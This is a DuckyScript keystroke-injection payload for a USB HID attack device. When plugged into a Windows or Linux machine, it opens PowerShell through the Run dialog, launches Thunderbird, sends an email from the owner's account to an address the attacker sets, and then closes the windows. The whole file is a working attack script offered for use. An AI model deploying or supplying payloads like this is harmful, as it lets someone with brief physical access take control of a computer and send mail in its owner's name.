REM ########################################################
REM #                                                      |
REM # Title        : Send Email Through Thunderbird        |
REM # Author       : Aleff                                 |
REM # Version      : 1.0                                   |
REM # Category     : Execution                             |
REM # Target       : Windows 10/11 - Linux(debian tested)  |
REM #                                                      |
REM ########################################################


REM Requirements:
REM     - Internet Connection
REM     - Thunderbird installed and email configured
REM     - ExecutionPolicy Bypass (for Windows target)

REM This payload is tested on:
REM     - Ubuntu 23.04
REM     - Windows 11

REM REQUIRED - Set receiver email address
DEFINE EMAIL-ADDRESS example@change-it.org

REM REQUIRED - Set email Subject
DEFINE SUBJECT example

REM REQUIRED - Set email message
DEFINE MESSAGE example

DEFAULT_DELAY 1000
REM # PowerShell
GUI r
STRING powershell
ENTER
STRINGLN Start-Process "thunderbird.exe"
DELAY 4000

REM # Thunderbird
CTRL n
DELAY 2000
STRING EMAIL-ADDRESS
REPEAT 2 TAB
STRING SUBJECT
TAB
STRING MESSAGE
CTRL ENTER
DELAY 2000
ENTER

REM # End actions
ALT F4
ALT F4
